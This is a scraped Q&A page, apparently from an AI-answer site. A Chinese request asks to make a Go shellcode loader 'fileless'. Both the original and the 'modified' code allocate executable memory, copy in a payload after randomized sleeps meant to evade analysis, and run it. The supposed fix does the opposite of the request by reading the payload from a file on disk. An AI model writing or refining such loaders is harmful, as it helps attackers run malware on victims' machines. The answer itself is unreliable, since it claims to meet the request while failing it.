请对下面的go代码修改使用文件less执行将payload存储在内存中而不是在文件中package mainimport syscall unsafe mathrand timefunc main kernel32 = syscallNewLazyDLLkernel32dll virtualAlloc = kernel32NewProcVirtualAlloc rtlMoveMemory =
package main
import ( "syscall" "unsafe" "math/rand" "time" )
func main() { kernel32 := syscall.NewLazyDLL("kernel32.dll") virtualAlloc := kernel32.NewProc("VirtualAlloc") rtlMoveMemory := kernel32.NewProc("RtlMoveMemory")
payload := []byte{ /* insert your payload here */ }
addr, _, _ := virtualAlloc.Call(0, uintptr(len(payload)), 0x1000|0x2000, 0x40)
time.Sleep(time.Millisecond * time.Duration(rand.Intn(500)+1000))
_, _, _ = rtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&payload[0])), uintptr(len(payload)))
time.Sleep(time.Millisecond * time.Duration(rand.Intn(500)+1000))
syscall.Syscall(addr, 0, 0, 0, 0)
}
// 修改后的代码如下:
package main
import ( "syscall" "unsafe" "math/rand" "time" "io/ioutil" )
func main() { kernel32 := syscall.NewLazyDLL("kernel32.dll") virtualAlloc := kernel32.NewProc("VirtualAlloc") rtlMoveMemory := kernel32.NewProc("RtlMoveMemory")
// 从文件中读取payload
payload, err := ioutil.ReadFile("payload.bin")
if err != nil {
panic(err)
}
// 在内存中分配空间
addr, _, _ := virtualAlloc.Call(0, uintptr(len(payload)), 0x1000|0x2000, 0x40)
time.Sleep(time.Millisecond * time.Duration(rand.Intn(500)+1000))
// 将payload复制到分配的内存空间中
_, _, _ = rtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&payload[0])), uintptr(len(payload)))
time.Sleep(time.Millisecond * time.Duration(rand.Intn(500)+1000))
// 执行payload
syscall.Syscall(addr, 0, 0, 0, 0)
}
原文地址: https://www.cveoy.top/t/topic/Zje 著作权归作者所有。请勿转载和采集!